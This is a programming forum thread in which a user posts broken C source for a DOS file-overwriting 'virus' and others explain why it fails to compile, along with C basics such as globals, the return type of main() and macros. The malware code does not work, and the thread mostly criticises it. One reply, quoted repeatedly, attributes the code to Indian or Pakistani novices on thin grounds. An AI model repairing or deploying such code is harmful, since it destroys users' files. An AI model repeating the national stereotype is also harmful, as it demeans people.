What am I missing here.....? :(

[blackneos940]

#include <stdio.h>

#include <io.h>

#include <dos.h>

#include <conio.h>

#include <time.h>

FILE *virus, *host;

int done, a = 0;

unsigned long x;

char buff[2048];

stuct ffblk ffblk;

clock_t st, end;

void main()

{
  st = clock();

  clrscr();

  done = findfirst(*.*, &blk, 0); //Search for a file with any extension (*.*)

  while (done)
  
  {
    virus = fopen(_argv[0], "rb");
  
    host = fopen(ffblk ff_name, "rb+");
  
    if (host == NULL) goto next;
  
    x = 89088;
  
    printf ("Infecting %s\n", ffblk.ff_name, a);
  
    while (x > 2048)
    
    {
      fread(buff, x, 1, virus);
    
      fwrite(buff, x, 1, host);
    
      a++;
    
      next;
    
      {
    fcloseall();
  
    done = findnext(&ffblk);
  
      }
  
  }

  printf ("DONE! (Totl Files Infected = %d)", a);

  end = clock();

  printf ("TIME TAKED = %f SEC\n!")

  (end-st/CLK_TCK);

  getch();

  return 0;

}

So I tried to get this code to run, to study how it works, but the amount of Brackets are confusing me..... Not only that, but why did the author use "void main"....? I thought it was "int main(void)".....? Also, I found it odd that Variables were declared BEFORE the actual Program was started, i.e., before "void main"..... Sigh....... Thanks for any help guys.......

 

[ryanvade]

Starting at the beginning we have includes...wait dos.h?

The variables beind declared before main are Global. Global variables can be accessed anywhere in the program, they have what is known as Global Scope. Variables have a scope, or as wikipedia defines it, "the scope of a name binding – an association of a name to an entity, such as a variable – is the part of a computer program where the binding is valid: where the name can be used to refer to the entity." If you instantiate a variable inside a function or method then the variable can only be accessed from INSIDE the function/method. Classes have a scope which works similarily (though then you get into objects vs. classes).

now the return type of main...I would not recommend using void as a return for main. When the return type is int then main will return its runtime status to the caller at completion which can be used to indicate success or failure of the program. It is possible to return nothing from main, illustrated with this program, but it is not a good idea for most situations.

As to what the program actually does...it seems to go through a list of files and "infects" them. Opening files, reading the contents, modifying the contents then continueing on its way. And it retuns the time it takes to "infect" the files.

 

[rstanley]

First of all, I am a little concerned about this code. With words such as "Infected", and "virus", I have to worry about the origin of this code. Please send me information where you obtained this code in a private message. PLEASE be careful where you obtain source code. Much of it is bad, or potentially dangerous, as I feel this is!

I don't recommend attempting to compile this code at all! It won't compile as written. I see many errors.

This is code written specifically for a Windows system. I will attempt to answer your questions, and make some observations.

You tend to use a lot of blank lines that are not needed and make it difficult to read the code.

The variables defined before the main() function (Global data) are seen from their definition to the end of the file, by any function. Data defined inside a function (Local Data) can only e seen within that function. Most data, if not all, should be defined as Local Data.

The braces define a blocak of code, a function, whhile or for statements, if statements, switch statements. The programmer has another set of braces that aren't really needed.

main() should be defined one of three ways:

// main() should ALWAYS return an int!!!

int main(void) // If no command line arguments are needed

// These other two are equivalent, if command line arguments are needed

int main(int argc, char *argv[])
//or
int main(int argc, char **argv)

Conio functions should not be used.
Two of the printf() statements, have an extra argument
The other printf() statement is malformed
A goto jumps into the while loop!
The while loop is an infinite loop as x is never changed!
More ...

Here is a better formatted version:

#include <stdio.h>
#include <io.h>
#include <dos.h>
#include <conio.h>  // Don't use
#include <time.h>

FILE *virus, *host;
int done, a = 0;
unsigned long x;
char buff[2048];
stuct ffblk ffblk;
clock_t st, end;

void main()
{
  st = clock();

  clrscr();

  done = findfirst(*.*, &blk, 0); //Search for a file with any extension (*.*)

  while (done)
  {
  virus = fopen(_argv[0], "rb");
  host = fopen(ffblk ff_name, "rb+");

  if (host == NULL) goto next;

  x = 89088;

  printf ("Infecting %s\n", ffblk.ff_name, a);
 
  while (x > 2048)
  {
  fread(buff, x, 1, virus);
  fwrite(buff, x, 1, host);
 
  a++;
 
  next;
 
  {
  fcloseall();
  done = findnext(&ffblk);
  }
  }

  printf("DONE! (Totl Files Infected = %d)", a);
  end = clock();
  printf ("TIME TAKED = %f SEC\n!") //No semicolon!

  (end-st/CLK_TCK); // ???

  getch(); // Don't use!

  return 0;
  }

 

[JasKinasis]

Whatever that is, it is very badly written. Evidently somebody's first attempt at a piece of Windows/DOS malware. Whoever wrote it wasn't particularly experienced with C.

It takes a command-line parameter. But the author has not specified that main takes any arguments, so I would imagine that the compiler would complain about the usage of argv[0] in the code!
The passed-in argument is apparently the path to a 'virus' of some description and attempts to 'infect' all files in the current directory with said virus by overwriting the original file with the virus file.

As rstanley pointed out, this code will not compile. Not even on the original Borland compiler that it was originally written for. I won't go into the specifics of the code too much as rstanley has that covered.

The usage of conio.h clearly shows that it WAS written for an ancient version of Borland turbo C/C++. The old Borland compilers predate the standards for C/C++, which is probably why whoever created this was using 'void main()', rather than 'int main()'. So either this code is very old, or whoever wrote it did not know any better - more on that shortly!

The proliferation of global variables also clearly indicates that whoever wrote this is a newbie. All of those variables should have been declared inside main. There is no need for global variables in this code at all. Global variables are almost always a bad idea, unless they are global constants! Indiscriminate use of global variables can lead to a lot of tricky bugs in code.

Also, rather than reading the 'virus' to the buffer multiple times; a more experienced programmer would read the 'virus' file into the buffer once and then simply write out the buffer to each file listed in the loop..... No need to read the source file multiple times. Terribly inefficient!

As for the origin of this code:
Sadly, various so-called 'education' establishments in countries like India, Pakistan and some African countries still insist on using ancient, outdated Borland compilers to teach C/C++. Quite why is beyond me, but there seems to be a generation of coders in these countries who are still learning to use terribly outdated practices on an equally outdated compiler.

I see homework questions from students in these places all the time; using code containing non-standard, Borland-specific extensions/libraries and other outdated, pre-standard conventions in their code. I really don't understand why their teachers cannot update their curriculum and their systems to use something more up to date like gcc/mingw with a free IDE like Code::Blocks or Codelite, or even ::shudder:: Visual Studio Express. But that's a rant for another day!

The badly worded output/message in the code:
"TIME TAKED ..."
clearly shows that the original author of the code is either partially literate, or more likely that english is a second language to them.

So I'd guess that this code originated from an Indian or Pakistani programming newbie, as most recent posts I've seen containing ancient Borland code have originated from there.

The bottom line is: This is very badly written code, it is incomplete. And if you do manage to fix it and run it, it will trash whatever files you have in the directory it is ran in by overwriting them all with another file. It's certainly not something you want to be learning C from. If anything, it is an example of how NOT to write a C program!

Incidentally, in Linux you could use a shell-script one-liner using common CLI tools to do what this C program is attempting to do. I won't tell you what it is though as somebody might misuse it, or accidentally trash their own files. And I wouldn't want to be responsible for causing that!

 

[rstanley]

Whatever that is, it is very badly written. Evidently somebody's first attempt at a piece of Windows/DOS malware. Whoever wrote it wasn't particularly experienced with C.

It takes a command-line parameter. But the author has not specified that main takes any arguments, so I would imagine that the compiler would complain about the usage of argv[0] in the code!
The passed-in argument is apparently the path to a 'virus' of some description and attempts to 'infect' all files in the current directory with said virus by overwriting the original file with the virus file.

As rstanley pointed out, this code will not compile. Not even on the original Borland compiler that it was originally written for. I won't go into the specifics of the code too much as rstanley has that covered.

The usage of conio.h clearly shows that it WAS written for an ancient version of Borland turbo C/C++. The old Borland compilers predate the standards for C/C++, which is probably why whoever created this was using 'void main()', rather than 'int main()'. So either this code is very old, or whoever wrote it did not know any better - more on that shortly!

The proliferation of global variables also clearly indicates that whoever wrote this is a newbie. All of those variables should have been declared inside main. There is no need for global variables in this code at all. Global variables are almost always a bad idea, unless they are global constants! Indiscriminate use of global variables can lead to a lot of tricky bugs in code.

Also, rather than reading the 'virus' to the buffer multiple times; a more experienced programmer would read the 'virus' file into the buffer once and then simply write out the buffer to each file listed in the loop..... No need to read the source file multiple times. Terribly inefficient!

As for the origin of this code:
Sadly various so-called 'education' establishments in countries like India, Pakistan and some African countries still insist on using ancient, outdated Borland compilers to teach C/C++. Quite why is beyond me, but there seems to be a generation of coders in these countries who are still learning to use terribly outdated practices on an equally outdated compiler.

I see homework questions from students in these places all the time, using code containing non-standard, Borland-specific extensions/libraries and other outdated, pre-standard conventions in their code. I really don't understand why their teachers cannot update their curriculum and their systems to use something more up to date like gcc/mingw with a free IDE like Code::Blocks or Codelite, or even ::shudder:: Visual Studio Express. But that's a rant for another day!

The badly worded output/message in the code:
"TIME TAKED ..."
clearly shows that the original author of the code is either partially literate, or more likely that english is a second language to them.

So I'd guess that this code originated from an Indian or Pakistani programming newbie, as most recent posts I've seen containing ancient Borland code have originated from there.

The bottom line is: This is very badly written code, it is incomplete. And if you do manage to fix it and run it, it will trash whatever files you have in the directory it is ran in by overwriting them all with another file. It's certainly not something you want to be learning C from. If anything, it is an example of how NOT to write a C program!

Incidentally, in Linux you could use a shell-script one-liner using common CLI tools to do what this C program is attempting to do. I won't tell you what it is though as somebody might misuse it, or accidentally trash their own files. And I wouldn't want to be responsible for causing that!

conio is not Borland specific. It predates Borland and MS and was created by one of the first DOS compilers, Lattice C. Unfortunately I also see Linux "programmers" using void main() thinking it is valid code!

There are still programmers using the old "K&R" form of function definition.

 

[JasKinasis]

conio is not Borland specific. It predates Borland and MS and was created by one of the first DOS compilers, Lattice C.

I was unaware of Lattice C. Never heard of that one before. The only compiler I knew of that used conio.h was Borland. In my experience, pretty much all C code that you see in the wild nowadays that includes conio.h was originally written for Borland compilers.

Unfortunately I also see Linux "programmers" using void main() thinking it is valid code!

Yup, bad coders are everywhere!

There are still programmers using the old "K&R" form of function definition.

Ah, the old implicit int thing... Don't declare the return value for your function and it implies an int return value. Yes, I've seen that too!

 

[rstanley]

Ah, the old implicit int thing... Don't declare the return value for your function and it implies an int return value. Yes, I've seen that too!

WORSE!

foo(x, y) 
  int x;
  float y;
{

  /* Code ... */

}

BION, the K&R parameter style is STILL valid in C11!!! I tested it!

Mickey$oft bought Lattice C and used it to release their first compiler! Of course they didn't write it from scratch, nor anything else! ;^)

AFAIK, conio is still in Mickey$oft C. It would need to be to support MS legacy code. I see it used in code all the time on the cprogramming.com C Forum.

 

[JasKinasis]

Ah, crap! :: slaps head :: What was I thinking?!

You're right, conio.h is the MSDOS specific console header file containing various console related functions isn't it?!..... The Borland specific header that I keep seeing everywhere in posts was graphics.h! Duh!

Sorry... Yes, I am officially a muppet! Licking Windows was my idea!

Seriously, how did I manage to get those two mixed up?! Ha ha! XD. A lot of programs using graphics.h also use conio.h I guess.... Shows how long it's been since I last did any non-portable, Windows-only development!

Noobs switching from Windows programming to Linux programming are always having problems with conio.h missing, because it is a non-standard extension only for Windows/DOS. Whereas graphics.h is the Borland-specific, Windows/DOS only header containing non-standard extensions that provide similar functionality to curses/ncurses. When first switching from using the ancient Borland compilers to, well.. Any other compiler, regardless of the platform; the missing graphics.h file is what trips them up!

Backwards compatibility is obviously the reason that the K&R syntax is still accepted/supported. Saves having to re-write already working and tested legacy code just to fit in with the current standard for the syntax I suppose!

 

[rstanley]

No probs! "Stuff" happens! ;^)

I've done my own bone - head responses before ! ;^)

 

[DevynCJohnson]

Using "int main(void)" is best for Unixoid and POSIX systems since a return of "0" indicates that the program executed successfully. In a C-programming class that I finished a few weeks ago, I was taught that "int main(void)" is best for all systems.

Also, when making a cross-platform program, try to avoid system-specific libraries and coding techniques. If you must use system-specific code, then try to use macros to ensure that such code is only used when compiling for that system.

The author of the posted code used "void main()" so that nothing is returned after execution.

For any programming language that you want to learn, check out this list of suggested websites (sorted by computer language) - http://dcjtech.info/programming-documentation/ .

In C/C++ and many other programming languages, the code executes faster when all variables are declared and created first. This is even true in interpreted scripting languages such as Python (I have tested this myself).

 

[rstanley]

int main(...) is NOT a matter of "Opinion" or "Best Practices", it is a part of the C programming Language, ISO Standard, both C99, and C11.

From the latest freely accessible C99 Draft Standard (PDF), and C11 Draft Standard (PDF):

5.1.2.2.1 Program startup

The function called at program startup is named main. The implementation declares no
prototype for this function. It shall be defined with a return type of int and with no
parameters:

int main(void) { /* ... */ }

or with two parameters (referred to here as argc and argv, though any names may be
used, as they are local to the function in which they are declared):

int main(int argc, char *argv[]) { /* ... */ }

or equivalent) or in some other implementation-defined manner.

 

[ryanvade]

int main(...) is NOT a matter of "Opinion" or "Best Practices", it is a part of the C programming Language, ISO Standard, both C99, and C11.

From the latest freely accessible C99 Draft Standard (PDF), and C11 Draft Standard (PDF):

Yes but it is possible to compile a program with void main even though it does not meet the standard. Terrible, terrible practice but possible. Which is why, when using gcc/g++, its a good idea to use -pedantic or -pedantic-error and you should specify the standard when compiling.

 

[blackneos940]

Whatever that is, it is very badly written. Evidently somebody's first attempt at a piece of Windows/DOS malware. Whoever wrote it wasn't particularly experienced with C.

It takes a command-line parameter. But the author has not specified that main takes any arguments, so I would imagine that the compiler would complain about the usage of argv[0] in the code!
The passed-in argument is apparently the path to a 'virus' of some description and attempts to 'infect' all files in the current directory with said virus by overwriting the original file with the virus file.

As rstanley pointed out, this code will not compile. Not even on the original Borland compiler that it was originally written for. I won't go into the specifics of the code too much as rstanley has that covered.

The usage of conio.h clearly shows that it WAS written for an ancient version of Borland turbo C/C++. The old Borland compilers predate the standards for C/C++, which is probably why whoever created this was using 'void main()', rather than 'int main()'. So either this code is very old, or whoever wrote it did not know any better - more on that shortly!

The proliferation of global variables also clearly indicates that whoever wrote this is a newbie. All of those variables should have been declared inside main. There is no need for global variables in this code at all. Global variables are almost always a bad idea, unless they are global constants! Indiscriminate use of global variables can lead to a lot of tricky bugs in code.

Also, rather than reading the 'virus' to the buffer multiple times; a more experienced programmer would read the 'virus' file into the buffer once and then simply write out the buffer to each file listed in the loop..... No need to read the source file multiple times. Terribly inefficient!

As for the origin of this code:
Sadly, various so-called 'education' establishments in countries like India, Pakistan and some African countries still insist on using ancient, outdated Borland compilers to teach C/C++. Quite why is beyond me, but there seems to be a generation of coders in these countries who are still learning to use terribly outdated practices on an equally outdated compiler.

I see homework questions from students in these places all the time; using code containing non-standard, Borland-specific extensions/libraries and other outdated, pre-standard conventions in their code. I really don't understand why their teachers cannot update their curriculum and their systems to use something more up to date like gcc/mingw with a free IDE like Code::Blocks or Codelite, or even ::shudder:: Visual Studio Express. But that's a rant for another day!

The badly worded output/message in the code:
"TIME TAKED ..."
clearly shows that the original author of the code is either partially literate, or more likely that english is a second language to them.

So I'd guess that this code originated from an Indian or Pakistani programming newbie, as most recent posts I've seen containing ancient Borland code have originated from there.

The bottom line is: This is very badly written code, it is incomplete. And if you do manage to fix it and run it, it will trash whatever files you have in the directory it is ran in by overwriting them all with another file. It's certainly not something you want to be learning C from. If anything, it is an example of how NOT to write a C program!

Incidentally, in Linux you could use a shell-script one-liner using common CLI tools to do what this C program is attempting to do. I won't tell you what it is though as somebody might misuse it, or accidentally trash their own files. And I wouldn't want to be responsible for causing that!

Well..... To be honest, the Code was (supposedly), deliberately written like that to prevent Skiddies from using it..... I'm not that great at C, so you can see why..... But, I wouldn't worry about being held responsible..... People running Code is up to THEM..... But you can tell me..... All I need is a VM!.... :3 Basically, I'm trying to study how these types of Programs work, as part of my (eventual) Pen Testing Career..... :3 Yeah..... I THOUGHT it was written wrong, aside from the intentional, Skiddie-Busting mistakes.....

 

[blackneos940]

int main(...) is NOT a matter of "Opinion" or "Best Practices", it is a part of the C programming Language, ISO Standard, both C99, and C11.

From the latest freely accessible C99 Draft Standard (PDF), and C11 Draft Standard (PDF):

I thought so...... :3 Boy, what would I do without you guys.....? :3 I'd probably be using some horrible mutation of K&R C, along with every other standard, up to the Modern Day.....

 

[blackneos940]

int main(...) is NOT a matter of "Opinion" or "Best Practices", it is a part of the C programming Language, ISO Standard, both C99, and C11.

From the latest freely accessible C99 Draft Standard (PDF), and C11 Draft Standard (PDF):

Also, thanks for the Links!..... ^^

 

[blackneos940]

Using "int main(void)" is best for Unixoid and POSIX systems since a return of "0" indicates that the program executed successfully. In a C-programming class that I finished a few weeks ago, I was taught that "int main(void)" is best for all systems.

Also, when making a cross-platform program, try to avoid system-specific libraries and coding techniques. If you must use system-specific code, then try to use macros to ensure that such code is only used when compiling for that system.

The author of the posted code used "void main()" so that nothing is returned after execution.

For any programming language that you want to learn, check out this list of suggested websites (sorted by computer language) - http://dcjtech.info/programming-documentation/ .

In C/C++ and many other programming languages, the code executes faster when all variables are declared and created first. This is even true in interpreted scripting languages such as Python (I have tested this myself).

Ok, then..... I see.... But what is a Macro, good sir.....? :3 Also, I though that "conio.h" was good for things like watching for Key presses.....? But maybe this is where those "Macro" thingies come in..... :3

 

[blackneos940]

WORSE!

foo(x, y)
  int x;
  float y;
{

  /* Code ... */

}

BION, the K&R parameter style is STILL valid in C11!!! I tested it!

Mickey$oft bought Lattice C and used it to release their first compiler! Of course they didn't write it from scratch, nor anything else! ;^)

AFAIK, conio is still in Mickey$oft C. It would need to be to support MS legacy code. I see it used in code all the time on the cprogramming.com C Forum.

Really.....? Is that partially why they get Zero-Days all the time.....? Old Standards....? Wow.....

 

[rstanley]

Really.....? Is that partially why they get Zero-Days all the time.....? Old Standards....? Wow.....

This is not a Zero-Day thing. This was from the original K&R Standard, before the ISO standard for function definition. I would guess that modern compilers such as gcc or clang could produce the same code for both of these examples:

foo(x, y) /* K&R */
  int x;
  float y;
{
  /* Code ... */
}

foo(int x, float y) /* ISO, PREFERRED */
{
  /* Code ... */
}

Some older or non-standard compliant compilers might not.

 

[blackneos940]

Starting at the beginning we have includes...wait dos.h?

The variables beind declared before main are Global. Global variables can be accessed anywhere in the program, they have what is known as Global Scope. Variables have a scope, or as wikipedia defines it, "the scope of a name binding – an association of a name to an entity, such as a variable – is the part of a computer program where the binding is valid: where the name can be used to refer to the entity." If you instantiate a variable inside a function or method then the variable can only be accessed from INSIDE the function/method. Classes have a scope which works similarily (though then you get into objects vs. classes).

now the return type of main...I would not recommend using void as a return for main. When the return type is int then main will return its runtime status to the caller at completion which can be used to indicate success or failure of the program. It is possible to return nothing from main, illustrated with this program, but it is not a good idea for most situations.

As to what the program actually does...it seems to go through a list of files and "infects" them. Opening files, reading the contents, modifying the contents then continueing on its way. And it retuns the time it takes to "infect" the files.

Yeah..... I'm not sure why dos.h is used..... Isn't there already Windows.h.....?? Ah, so those are called <b>Global Variables</b>...... :3 THAT'S why I see those before "int main" in the Linux Kernel..... Ok, then..... So DON'T use void before main..... Got it!.... :3 Yeah, I didn't think it did more than just overwrite the contents of files.....

 

[rstanley]

Ok, then..... I see.... But what is a Macro, good sir.....? :3 Also, I though that "conio.h" was good for things like watching for Key presses.....? But maybe this is where those "Macro" thingies come in..... :3

A macro is anything using #define. They are translated by the Preprocessor before the compiler sees the code.

Two examples are:

#define MAX 10    /* Use MAX anywhere 10 would be used. */
/* ... */
int ary[MAX];

#define mult(x, y) (x) * (y)

/* ... */

val = mult(2 + 3, 4 + 5);

/* Would translate to:
val = (2 + 3) * (4 + 5);
*/